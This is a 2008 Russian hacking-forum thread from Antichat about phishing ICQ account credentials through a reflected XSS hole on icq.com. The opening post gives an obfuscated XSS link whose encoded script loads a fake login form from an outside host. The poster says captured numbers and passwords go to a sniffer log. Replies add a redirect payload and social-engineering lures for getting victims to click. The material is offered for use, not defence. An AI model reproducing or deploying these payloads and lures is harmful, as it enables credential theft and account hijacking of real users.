Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Фэйк через Xss на Icq.com |
18.03.2008, 11:06
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Фэйк через Xss на Icq.com
Увидел тему на форуме "Хss на Icq.com" только вот смысла в ней нету. ведь имея куки юин не угониш.
в голову пришла идея использовать фэйк через хсс
вот пример такой реализации фэйка через хss (пассивную, активную жалко выкладывать)
Код:
http://www.icq.com/search/results.php?q=%3Cscrip%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,101,119,113,101,119,113,101,113,101,119,113,101,119,113,46,110,97,114,111,100,46,114,117,47,102,51,46,106,115,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
пс: убрать все пробелы в ссылке
номер-пароль будут приходить на http://antichat.org/s/red/log.php
актуально под всеми браузерами
( правдо в лисе приходят штук так 20 отчотов вместо одного)
скрипт фэйка почти беспаливный после ввода данных в форму данные летят на снифер и потом пытаются залогинится с этими данными на www.icq.com так что жертва пропалить ничего неладного (типо переадресации на левый сайт, обычнно этот метод используют в таких фэйках) не должна
Последний раз редактировалось ZET36; 18.03.2008 в 11:09..
|
|
|
18.03.2008, 15:01
|
|
Участник форума
Регистрация: 28.04.2007
Сообщений: 239
Провел на форуме:
2140476
Репутация:
161
|
|
Лиса криво себя ведёт, а так да. В опере затребовала сертификаты безопасности.
|
|
|
|
21.03.2008, 18:09
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
ну на примере icq не получиться но пассивку для фейка можно и так использовать :
Код:
<script type="text/javascript">window.top.location = "url";</script>
что откроет нам наш url с фейком |
|
|
|
21.03.2008, 18:12
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Только вот кто заходит на icq.com?
Тем более люди с четкими номерами
|
|
|
|
21.03.2008, 21:16
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от ultimatum
Лиса криво себя ведёт, а так да. В опере затребовала сертификаты безопасности.
это из за https протокла где авторизация
|
|
|
|
21.03.2008, 21:18
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от MaSter GeN
ну на примере icq не получиться но пассивку для фейка можно и так использовать :
Код:
<script type="text/javascript">window.top.location = "url";</script>
что откроет нам наш url с фейком можно но это будет паливно так как в урл будет виден левый сайт а не icq.com когда он будет авторизовавыться, мало кто будет отсылать свой пароль от аськи на левый сайт
Последний раз редактировалось ZET36; 21.03.2008 в 21:32..
|
|
|
|
21.03.2008, 21:22
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от iddqd
Только вот кто заходит на icq.com?
Тем более люди с четкими номерами
Незнаю можно применить Си тпо такого "Служба icq хочет повысить посещение на сайте , если вы зайдёте в свой профиль и активируете данный запрос по этой ссылке то ваш значок в аське будет золотого цвета" ну или что то типа такого
а вообще этот фейк висит у меня на активной хсс (так что исчите активку)
Последний раз редактировалось ZET36; 21.03.2008 в 21:31..
|
|
|
|
21.03.2008, 23:54
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
Сообщение от ZET36
Незнаю можно применить Си тпо такого "Служба icq хочет повысить посещение на сайте , если вы зайдёте в свой профиль и активируете данный запрос по этой ссылке то ваш значок в аське будет золотого цвета" ну или что то типа такого
а вообще этот фейк висит у меня на активной хсс (так что исчите активку)
ага СЭ в данном случаеш решает все !! если честно то можно уговорить и на adult.com ввести номер своей аськи с паролем 
Последний раз редактировалось MaSter GeN; 21.03.2008 в 23:57..
|
|
|
|
23.03.2008, 11:11
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от MaSter GeN
ага СЭ в данном случаеш решает все !! если честно то можно уговорить и на adult.com ввести номер своей аськи с паролем ды в любых пассивных атаках Си неотемлимая чать, возможно даже главнее чем сама ценность уязвимости
|
|
|
|
04.01.2009, 15:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Нужен человек, который хорошо знает тип атаки XSS! напишите, пожалуйста, в аську: 5703828
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
